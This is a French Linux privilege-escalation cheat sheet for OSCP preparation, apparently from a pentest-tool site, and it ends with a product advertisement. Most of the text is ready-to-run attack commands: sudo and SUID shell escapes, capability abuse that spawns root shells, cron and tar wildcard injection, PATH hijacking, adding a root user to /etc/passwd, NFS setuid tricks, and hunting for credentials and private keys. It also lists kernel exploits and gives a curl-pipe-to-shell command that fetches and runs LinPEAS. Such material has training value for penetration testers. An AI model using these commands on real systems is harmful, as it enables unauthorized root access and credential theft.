# Énumération initiale
L'élévation de privilèges, c'est 90 % d'énumération. Recueillez le contexte avant tout exploit : qui vous êtes, ce que vous pouvez exécuter, à quoi ressemble le système.
id && whoami && groupsuname -a; cat /etc/os-releasesudo -lfind / -perm -4000 -type f 2>/dev/nullgetcap -r / 2>/dev/nullcat /etc/crontab; ls -la /etc/cron.*ps aux | grep -i rootnetstat -tulpn 2>/dev/null || ss -tulpn# Exploitation de sudo
Après sudo -l, recoupez chaque binaire autorisé avec GTFOBins. Beaucoup d'outils courants ouvrent un shell root via sudo.
sudo vim -c ':!/bin/sh'sudo find . -exec /bin/sh \; -quitsudo awk 'BEGIN {system("/bin/sh")}'sudo env /bin/shsudo -u#-1 /bin/bashsudo --version. Les versions < 1.9.5p2 sont vulnérables à Baron Samedit (CVE-2021-3156), un dépassement de tas donnant root instantanément.# Binaires SUID / SGID
Un binaire SUID s'exécute avec les droits de son propriétaire (souvent root), peu importe qui le lance. Énumérez, puis exploitez via la section « SUID » de GTFOBins.
find / -perm -4000 -type f 2>/dev/nullfind / -perm -2000 -type f 2>/dev/null./bash -pfind /tmp -exec /bin/sh -p \; -quitcp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash# Capabilities Linux
Les capabilities accordent des morceaux de pouvoir root à des binaires précis. cap_setuid est le jackpot.
getcap -r / 2>/dev/null/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'/usr/bin/perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/sh";'# Tâches cron
Les scripts planifiés appartenant à root que vous pouvez modifier — ou qui utilisent des wildcards exploitables — sont un chemin classique vers root.
cat /etc/crontab; ls -la /etc/cron.d /etc/cron.dailygrep -rl "" /etc/cron* 2>/dev/null | xargs ls -la 2>/dev/nullecho 'cp /bin/bash /tmp/rb; chmod +s /tmp/rb' >> /chemin/cron_modifiable.shtar czf backup.tar.gz * dans un dossier modifiable peut être détourné en créant des fichiers nommés comme des options tar (ex. --checkpoint-action=exec=sh rootshell.sh).# PATH Hijacking
Quand un programme privilégié appelle une commande sans chemin absolu, vous contrôlez quel binaire s'exécute réellement.
strings /chemin/binaire_suid | grep -iE 'service|cp|cat|sh|system'echo '/bin/bash -p' > /tmp/service; chmod +x /tmp/serviceexport PATH=/tmp:$PATH; /chemin/binaire_suid# Identifiants & fichiers sensibles
Mots de passe en dur, clés privées et /etc/passwd modifiable se trouvent sur plus de machines qu'on ne le croit.
grep -rniE 'password|passwd|secret|api_key' /var/www /home /opt 2>/dev/nullfind / -name id_rsa 2>/dev/null; find / -name '*.kdbx' 2>/dev/nullls -l /etc/passwdopenssl passwd -1 -salt x hackedecho 'root2:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd; su root2cat ~/.bash_history; sudo cat /var/mail/root 2>/dev/null# Mauvaise config NFS Root Squash
Un partage NFS exporté avec no_root_squash vous permet d'écrire des fichiers en tant que root depuis une machine que vous contrôlez.
cat /etc/exports; showmount -e CIBLEmount -o rw CIBLE:/share /mnt/nfscp /bin/bash /mnt/nfs/rootbash; chmod +s /mnt/nfs/rootbash# Exploits noyau (dernier recours)
À utiliser seulement après avoir épuisé les mauvaises configs — ils peuvent planter la cible. Faites toujours correspondre le noyau exact de uname -r.
| Exploit | CVE | Concerné |
|---|---|---|
| DirtyPipe | CVE-2022-0847 | Noyau 5.8 – 5.16.11 |
| DirtyCow | CVE-2016-5195 | Noyau 2.6.22 – 4.8.3 |
| PwnKit (polkit) | CVE-2021-4034 | La plupart des distros avant 2022 |
| Baron Samedit | CVE-2021-3156 | sudo < 1.9.5p2 |
searchsploit linux kernel $(uname -r | cut -d- -f1)./PwnKit# Outils d'énumération automatisés
Automatisez les parties fastidieuses — mais comprenez chaque résultat. À l'examen OSCP, les outils automatisés sont limités : la maîtrise manuelle compte.
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh./linenum.sh -t./pspy64python3 linux-exploit-suggester.py❓ FAQ élévation de privilèges Linux
Par l'énumération. Commencez par id, sudo -l, uname -a et la recherche SUID (find / -perm -4000). LinPEAS aide, mais l'énumération manuelle est indispensable pour l'examen OSCP.
Lancez sudo -l et recoupez chaque binaire autorisé avec GTFOBins. Beaucoup (vim, find, awk, python) ouvrent un shell root via sudo. Vérifiez aussi la version pour CVE-2021-3156.
Un binaire SUID s'exécute avec les droits de son propriétaire (souvent root). Trouvez-les avec find / -perm -4000 2>/dev/null, puis consultez GTFOBins pour la méthode d'exploitation SUID du binaire.
Elles découpent le pouvoir root en unités fines. Listez-les avec getcap -r / 2>/dev/null. Les plus dangereuses comme cap_setuid sur python ou perl permettent de devenir root directement.
Vérifiez /etc/crontab pour des scripts root. Si un script planifié est modifiable, ou utilise un chemin relatif ou wildcard que vous contrôlez, vous pouvez injecter des commandes exécutées en root.
Si un binaire SUID ou un script cron appelle une commande sans chemin absolu, placez un binaire malveillant de ce nom plus tôt dans $PATH. Quand root exécute le programme, votre binaire s'exécute en root.
Uniquement en dernier recours — ils peuvent planter la cible. Épuisez d'abord les chemins de mauvaise config (sudo, SUID, cron), et faites correspondre le noyau exact de uname -a avant de compiler un exploit.
LinPEAS est un script d'énumération automatisée qui met en évidence les vecteurs privesc, colorés selon leur probabilité. Lancez ./linpeas.sh et examinez les résultats rouges/jaunes. Il complète — sans la remplacer — l'énumération manuelle.
📚 Ressources liées
- Cheatsheet OSCP — Référence des commandes de l'examen OSCP, où la privesc pèse 25 % des points
- Cheatsheet Nmap — 100+ commandes de scan — l'étape de recon avant d'obtenir un shell
- Cheatsheet Pentest complète — 200+ commandes : recon, web, exploitation, Active Directory
- Glossaire du pentest — SUID, capabilities, CVE et 60+ termes clés définis
Transformez vos résultats privesc en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité.
Envie des 12 020+ commandes ?
Cette cheatsheet privesc n'est qu'une branche de la carte. Pentest Mindmap organise 12 020+ commandes en 34 catégories — de la recon à la post-exploitation — avec recherche instantanée et copie en un clic.
Commencer gratuitement →